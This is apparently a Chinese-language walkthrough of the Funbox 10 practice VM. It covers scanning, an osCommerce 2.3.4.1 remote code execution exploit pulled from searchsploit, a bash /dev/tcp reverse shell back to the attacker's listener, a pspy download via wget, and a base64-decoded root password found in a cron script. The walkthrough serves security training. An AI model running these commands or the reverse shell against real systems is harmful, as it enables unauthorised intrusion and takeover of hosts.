Funbox 10 靶机wp

主机探活

nmap -sP 192.158.159.0/24

目标靶机IP:192.168.159.161


端口发现

nmap -sV -p- -A 192.168.159.161

Funbox 10 靶机wp_第1张图片

开放了 22、25、80、110、143


80端口

nikto

nikto -h 192.168.159.161

Funbox 10 靶机wp_第2张图片

没有有用信息


目录扫描

dirsearch -u 192.168.159.161

Funbox 10 靶机wp_第3张图片


访问扫描出来的这些目录,发现 catalog 目录下是一个cms

Funbox 10 靶机wp_第4张图片


CMS

本地漏洞库搜索一下现有漏洞

searchsploit oscommerce 2.3.4.1

Funbox 10 靶机wp_第5张图片

存在漏洞!


直接尝试 RCE 的漏洞能否利用

searchsploit -m 44374.py	# 复制到当前目录

修改脚本文件

在这里插入图片描述


python 44374	# 执行

Funbox 10 靶机wp_第6张图片


成功执行,查看结果

Funbox 10 靶机wp_第7张图片


再次修改脚本文件,将命令改一下,反弹shell

在这里插入图片描述

bash -i >& /dev/tcp/192.168.159.131/7777 0>&2

在这里插入图片描述


本地开启监听

nc -nlvp 7777

失败了,没有反弹回来

原因:bash -i 的方法返回 shell 必须在bash的窗口中使用,直接在 php 文件中利用system函数调用是无效的!!!

正确方法应该是先用 php 调起 bash 环境,再反弹shell

bash -c 'bash -i >& /dev/tcp/192.168.159.131/7777 0>&2'

Funbox 10 靶机wp_第8张图片

注意单双引号 和 转义字符


成功反弹shell!

Funbox 10 靶机wp_第9张图片


提权

setuid

find / -perm -u=s -type f 2>/dev/null

没有可疑文件。。。(之后这些之前靶机都有的且无收获我都不放图了)


sudo

sudo -l

无收获


计划任务

crontab -l
cat /etc/crontab

无收获


信息收集

没找到啥有用的信息


脚本检测

网上自己搜,pspy脚本,有很多

python -m SimpleHTTPServer 80	# 本机开服务,准备下载
wget 192.168.159.131/pspy64		# 靶机下载
chmod +x pspy64					# 给执行权限
./pspy64						# 运行

在这里插入图片描述

一直在执行 cron.sh的一个计划任务,看看这个脚本执行了个啥(虽然不是 root 运行的,但基本就他在一直跑,没办法。。。)


在这里插入图片描述

发现有个大概base64加密的密文:LXUgcm9vdCAtcCByZnZiZ3QhIQ==


解个码

在这里插入图片描述

用户:root

密码:rfvbgt!!


su

su	# 直接切 root 用户

在这里插入图片描述


换种交互方式

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述


成功获取 root 权限!!!

在这里插入图片描述
Funbox 10 靶机wp_第10张图片

你可能感兴趣的:(网络,网络安全)